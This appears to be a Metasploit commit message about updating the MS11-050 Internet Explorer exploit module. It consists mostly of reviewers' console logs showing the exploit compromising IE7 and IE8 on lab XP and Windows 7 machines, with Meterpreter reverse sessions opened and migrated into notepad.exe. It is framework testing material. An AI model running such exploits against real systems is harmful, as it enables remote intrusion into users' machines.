Use RopDb in MS11-050, and correct autopwninfo

[wchen-r7]

Tested in IE7+Win XP, IE8+Win XP, IE8+Win7:

msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/YgNLSNzn5qi3YO
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:1044) at 2012-10-06 01:39:09 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:1044) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2872)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/agNoigHh53i8Rzg
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.6:1231) at 2012-10-06 01:17:53 -0500
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.6:1231) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1676
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) >
[*] 10.0.1.7         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on Windows 7)...
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.7:49159) at 2012-10-06 01:44:05 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.7:49159) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4064
[+] Successfully migrated to process

[jvazquez-r7]

Eyeballed, looks good, and tested on Windows XP SP3 with ie8 and Windows 7 sp1 wiht ie8. In both cases the exploit ran successfully:

msf  exploit(ms11_050_mshtml_cobjectelement) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/x3EGTYN
[*]  Local IP: http://192.168.1.128:8080/x3EGTYN
[*] Server started.
msf  exploit(ms11_050_mshtml_cobjectelement) > [*] 192.168.1.152    ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on XP SP3)...
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.152:2086) at 2012-10-06 14:07:01 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.152:2086) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1928)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 392
[+] Successfully migrated to process 
msf  exploit(ms11_050_mshtml_cobjectelement) > [*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.128    ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on Windows 7)...
[*] Sending stage (752128 bytes) to 192.168.1.128
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.128:56513) at 2012-10-06 14:08:46 +0200
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.128:56513) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1708)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2524
[+] Successfully migrated to process 

Merging!